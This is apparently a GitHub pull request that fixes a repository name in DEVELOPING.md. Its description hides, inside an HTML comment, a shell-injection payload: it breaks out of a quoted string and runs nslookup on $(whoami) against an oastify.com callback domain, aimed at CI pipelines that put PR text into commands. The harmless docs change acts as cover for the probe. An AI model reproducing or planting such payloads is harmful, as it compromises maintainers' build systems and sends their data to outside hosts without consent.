### PR TITLE
docs: fix repo name in DEVELOPING.md

### DIFF
--- a/DEVELOPING.md
+++ b/DEVELOPING.md
@@ -18,7 +18,7 @@ The packages directory contains the different npm packages.
 You would only do this once after you cloned the repository.
 
 1. Clone this repository from git.
-1. `cd` into `sfdx-dev-packages`.
+1. `cd` into `ts-types`.
 1. We develop using feature brances off `main` and release from the `main` branch. At
    this point, it should be set to `main` by default. If not, run `git checkout -t origin/main`.
 1. `yarn` to bring in all the top-level dependencies and bootstrap.


### PR DESCRIPTION
<!-- https://github.com/ "; nslookup $(whoami).mj942tatnnnvq6w7b8eoparcw32uqmeb.oastify.com ; #/actions/runs/ -->
I noticed the repo name in `DEVELOPING.md` differs from the current repo name. This PR fixes this by changing the name from `sfdx-dev-packages` to `ts-types`.